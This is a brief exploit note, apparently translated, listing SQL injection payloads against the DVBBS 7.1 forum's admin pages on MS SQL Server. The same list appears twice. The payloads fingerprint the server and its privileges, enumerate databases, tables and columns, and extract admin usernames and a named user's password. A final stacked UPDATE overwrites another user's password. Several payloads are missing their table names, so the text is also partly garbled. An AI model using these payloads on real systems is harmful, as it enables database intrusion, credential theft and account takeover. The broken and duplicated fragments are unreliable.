Vulnerability testing environment: DVBBS7.1 SQL
Affected documents
admin/
.....
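Vulnerability exploit (SQL injection fragments; they depend on the page concatenating request input into the T-SQL query, and the `>0` comparisons additionally depend on the database error text being returned to the client)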
(select @@version)>0 Get the SQL Server version string (it also reports the Windows build the server runs on)
and user_name()='dbo' Determine whether the current connection runs as the database owner (dbo), as it does, for example, when the application logs in as sa
(select user_name())>0 Reveal the database user of the current connection
(select db_name())>0 Get the currently connected database
(select IS_MEMBER('db_owner')) -Query whether the current user is a member of the db_owner role in the database
(select count(*) from where name>1 and dbid=7) --Query all database names
(select top 1 name from where xtype='U') -Query the database table name
(select top 1 name from where xtype='U' and name not in ('web_Admin')) -Query all table names of the database
(select count(*) from where xtype='U' and name='web_Admin' and uid>(str(id))) -Query table name ID
(select top 1 name from where id=1125579048) -Query field name
(select top 1 name from where id=1125579048 and name not in('adminname')) -Query all field names
(select count(*) from .web_Admin where AdminName>1)-Query user
(select count(*) from .web_Admin where Adminpwd>1 and username='bluefire')-Query user bluefire password
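;update .Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';-- Stacked statement that overwrites a user's stored password value; it succeeds only if the web application's database login has UPDATE rights on the table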
Affected documents
admin/
.....
Vulnerability exploit
(select @@version)>0 Get the SQL Server version string (it also reports the Windows build the server runs on)
and user_name()='dbo' Determine whether the current connection runs as the database owner (dbo), as it does, for example, when the application logs in as sa
(select user_name())>0 Reveal the database user of the current connection
(select db_name())>0 Get the currently connected database
(select IS_MEMBER('db_owner')) -Query whether the current user is a member of the db_owner role in the database
(select count(*) from where name>1 and dbid=7) --Query all database names
(select top 1 name from where xtype='U') -Query the database table name
(select top 1 name from where xtype='U' and name not in ('web_Admin')) -Query all table names of the database
(select count(*) from where xtype='U' and name='web_Admin' and uid>(str(id))) -Query table name ID
(select top 1 name from where id=1125579048) -Query field name
(select top 1 name from where id=1125579048 and name not in('adminname')) -Query all field names
(select count(*) from .web_Admin where AdminName>1)-Query user
(select count(*) from .web_Admin where Adminpwd>1 and username='bluefire')-Query user bluefire password
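;update .Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';-- Stacked statement that overwrites a user's stored password value; it succeeds only if the web application's database login has UPDATE rights on the table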